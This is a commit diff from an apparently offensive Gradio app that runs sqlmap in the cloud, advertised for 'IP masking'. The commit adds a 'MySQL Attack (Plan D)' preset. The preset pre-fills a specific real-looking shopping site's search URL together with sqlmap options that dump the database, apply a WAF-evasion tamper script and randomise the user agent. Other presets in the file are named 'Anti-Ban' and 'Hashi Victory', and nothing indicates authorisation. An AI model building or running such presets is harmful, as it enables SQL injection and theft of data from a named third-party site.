AlphaWolf commited on
Commit
c7bbb09
Β·
1 Parent(s): 52d0ea4

Add MySQL Attack (Plan D) preset

Browse files
Files changed (1) hide show
  1. app.py +15 -1
app.py CHANGED
@@ -94,6 +94,14 @@ def set_search_attack():
94
  "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
95
  )
96
 
 
 
 
 
 
 
 
 
97
  with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
98
  gr.Markdown("# 🌊 SLMP Cloud Runner - Ultra Speed 🌩️")
99
  gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth and IP masking. Designed for the Alpha Wolf.")
@@ -119,7 +127,8 @@ with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate"))
119
  btn_run = gr.Button("πŸ”₯ START SCAN", variant="primary")
120
  with gr.Row():
121
  btn_hashi = gr.Button("🏰 Hashi Victory (Anti-Ban)", variant="secondary")
122
- btn_search = gr.Button("πŸ” Search Attack (Plan C)", variant="stop")
 
123
  btn_stop = gr.Button("πŸ›‘ STOP", variant="stop")
124
 
125
  with gr.Column(scale=3):
@@ -143,6 +152,11 @@ with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate"))
143
  outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]
144
  )
145
 
 
 
 
 
 
146
  if __name__ == "__main__":
147
  print("✨ SLMP Panel Live.")
148
  demo.queue().launch(server_name="0.0.0.0", server_port=7860)
 
94
  "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
95
  )
96
 
97
+ def set_mysql_attack():
98
+ return (
99
+ "https://hashi.ae/?s=iphone",
100
+ 10, 5, 3,
101
+ "space2comment", "BEU", "",
102
+ "--dbms=MySQL --dump --force-ssl --random-agent --no-cast"
103
+ )
104
+
105
  with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
106
  gr.Markdown("# 🌊 SLMP Cloud Runner - Ultra Speed 🌩️")
107
  gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth and IP masking. Designed for the Alpha Wolf.")
 
127
  btn_run = gr.Button("πŸ”₯ START SCAN", variant="primary")
128
  with gr.Row():
129
  btn_hashi = gr.Button("🏰 Hashi Victory (Anti-Ban)", variant="secondary")
130
+ btn_search = gr.Button("πŸ” Search (Oracle - Plan C)", variant="stop")
131
+ btn_mysql = gr.Button("🐬 Search (MySQL - Plan D)", variant="secondary")
132
  btn_stop = gr.Button("πŸ›‘ STOP", variant="stop")
133
 
134
  with gr.Column(scale=3):
 
152
  outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]
153
  )
154
 
155
+ btn_mysql.click(
156
+ fn=set_mysql_attack,
157
+ outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]
158
+ )
159
+
160
  if __name__ == "__main__":
161
  print("✨ SLMP Panel Live.")
162
  demo.queue().launch(server_name="0.0.0.0", server_port=7860)